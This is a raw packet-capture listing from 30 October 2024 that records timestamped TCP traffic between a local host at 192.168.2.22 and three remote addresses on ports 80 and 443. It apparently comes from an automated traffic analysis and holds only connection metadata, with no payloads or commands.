                                                                                                          Oct 30, 2024 08:14:19.504740000 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.504766941 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.504779100 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.504904032 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.504949093 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.504951000 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.504961014 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.504988909 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.505009890 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.505053043 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.505315065 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.505371094 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.505381107 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.505415916 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.505485058 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.505485058 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.505485058 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.505485058 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.505536079 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.505584002 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.505584002 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.505594015 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.505625963 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.505634069 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.505650997 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.505660057 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.505686045 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.505693913 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.506551027 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.506602049 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.506603956 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.506613970 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.506649971 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.506654978 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.506660938 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.506670952 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.506695032 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.506702900 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.506750107 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.506794930 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.506804943 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.506814003 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.506828070 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.506855965 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.506863117 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.506978035 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.507025957 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.507034063 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.507044077 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.507075071 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.507297039 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.507304907 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.507309914 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.507337093 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.507344007 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.507348061 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.507380962 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.507402897 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.507431984 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.507436037 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.507441044 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.507466078 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.507478952 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.507513046 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.507523060 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.507554054 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.507581949 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.507592916 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.507616997 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.507630110 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.507669926 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.507679939 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.507688999 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.507703066 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.507709026 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.507723093 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.507735968 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.507899046 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.507939100 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.507944107 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.507949114 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.507981062 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.508025885 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.508035898 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.508044958 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.508054972 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.508068085 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.508081913 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.508110046 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.508143902 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.508156061 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.508188963 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.508311987 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.508353949 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.508356094 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.508378029 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.508394957 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.508409977 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.508457899 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.508467913 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.508476973 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.508500099 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.508513927 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.508582115 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.508599043 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.508609056 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.508630991 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.508641005 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.508846045 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.508892059 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.508907080 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.508917093 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.508939028 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.509000063 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.509011030 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.509042025 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.509953976 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.509998083 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.510001898 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.510009050 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.510037899 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.510118961 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.510129929 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.510138988 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.510149956 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.510162115 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.510176897 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.510312080 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.510322094 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.510330915 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.510340929 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.510358095 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.510370970 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.510551929 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.510562897 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.510567904 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.510571957 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.510582924 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.510595083 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.510601044 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.510605097 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.510615110 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.510616064 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.510627031 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.510629892 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.510646105 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.510662079 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.510859966 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.510870934 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.510879993 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.510891914 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.510902882 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.510910988 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.510926008 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.510938883 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.511003971 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.511044025 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.511193037 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.511203051 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.511212111 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.511223078 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.511233091 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.511239052 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.511248112 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.511254072 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.511259079 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.511267900 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.511269093 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.511280060 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.511282921 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.511290073 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.511298895 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.511300087 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.511307955 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.511317968 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.511328936 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.511343002 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.608706951 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.608746052 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.608767033 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.608781099 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.608788013 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.608800888 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.609065056 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.609558105 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.609612942 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.609626055 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.609630108 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.609662056 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.609687090 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.609698057 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.609710932 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.609723091 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.609726906 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.609746933 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.609755039 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.610264063 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.610317945 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.610325098 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.610341072 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.610368967 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.610379934 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.610420942 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.610434055 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.610471964 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.610918045 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.610955000 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.610971928 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.610996008 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.611175060 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.611228943 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.611228943 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.611242056 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.611272097 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.611284018 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.611597061 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.611653090 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.611653090 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.611690998 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.611696005 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.611705065 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.611735106 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.611747026 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.611829996 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.611843109 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.611855030 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.611871958 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.611881971 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.611891031 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.611916065 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.611934900 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.611979008 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.612592936 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.612647057 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.612649918 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.612660885 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.612751961 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.612761021 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.612773895 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.612823963 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.613069057 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.613173008 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.613179922 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.613184929 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.613195896 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.613214970 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.613226891 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.613239050 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.613253117 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.613269091 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.613281012 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.614012003 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.614073992 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.614087105 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.614170074 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.614218950 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.614340067 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.614398956 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.614408970 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.614411116 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.614459991 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.614484072 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.614495039 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.614506006 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.614532948 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.614551067 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.614579916 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.615089893 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.615119934 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.615133047 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.615149975 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.615164042 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.615170002 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.615521908 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.615535021 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.615549088 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.615561962 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.615576982 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.615585089 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.615606070 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.615745068 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.615783930 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.615793943 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.615796089 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.615833044 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.615855932 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.615869045 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.615881920 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.615896940 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.615910053 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.616233110 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.616276026 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.616286993 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.616286993 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.616324902 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.898577929 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:25.737227917 CET4916680192.168.2.22158.101.44.242
                                                                                                          Oct 30, 2024 08:14:25.742647886 CET8049166158.101.44.242192.168.2.22
                                                                                                          Oct 30, 2024 08:14:25.742722988 CET4916680192.168.2.22158.101.44.242
                                                                                                          Oct 30, 2024 08:14:25.751063108 CET4916680192.168.2.22158.101.44.242
                                                                                                          Oct 30, 2024 08:14:25.756349087 CET8049166158.101.44.242192.168.2.22
                                                                                                          Oct 30, 2024 08:14:26.415436029 CET8049166158.101.44.242192.168.2.22
                                                                                                          Oct 30, 2024 08:14:26.626916885 CET8049166158.101.44.242192.168.2.22
                                                                                                          Oct 30, 2024 08:14:26.627047062 CET4916680192.168.2.22158.101.44.242
                                                                                                          Oct 30, 2024 08:14:28.439865112 CET4916680192.168.2.22158.101.44.242
                                                                                                          Oct 30, 2024 08:14:28.445117950 CET8049166158.101.44.242192.168.2.22
                                                                                                          Oct 30, 2024 08:14:28.594269991 CET8049166158.101.44.242192.168.2.22
                                                                                                          Oct 30, 2024 08:14:28.642962933 CET49167443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:14:28.643004894 CET44349167188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:14:28.643065929 CET49167443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:14:28.782001019 CET49167443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:14:28.782037020 CET44349167188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:14:28.806952953 CET8049166158.101.44.242192.168.2.22
                                                                                                          Oct 30, 2024 08:14:28.807024956 CET4916680192.168.2.22158.101.44.242
                                                                                                          Oct 30, 2024 08:14:29.394224882 CET44349167188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:14:29.394360065 CET49167443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:14:29.399173975 CET49167443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:14:29.399197102 CET44349167188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:14:29.399507999 CET44349167188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:14:29.460791111 CET49167443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:14:29.503345013 CET44349167188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:14:29.600426912 CET44349167188.114.96.3192.168.2.22
